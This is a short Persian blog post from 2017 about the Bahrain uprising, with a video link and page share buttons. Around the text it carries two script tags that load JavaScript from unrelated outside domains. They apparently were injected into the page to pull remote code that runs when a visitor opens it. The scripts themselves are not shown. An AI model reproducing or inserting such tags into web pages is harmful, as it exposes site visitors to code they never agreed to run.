انقلاب بحرین؛ فریاد فراموش شدگان


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>خواسته ی مردم بحرین چیست؟
5 سال گذشت و انقلاب همچنان ادامه دارد...
برای اینکه بدانید در بحرین چه می گذرد این کلیپ را ببینید
<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0
ارسال در 1395/11/28 ساعت 16:59 2017-2-16 15:59:08

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر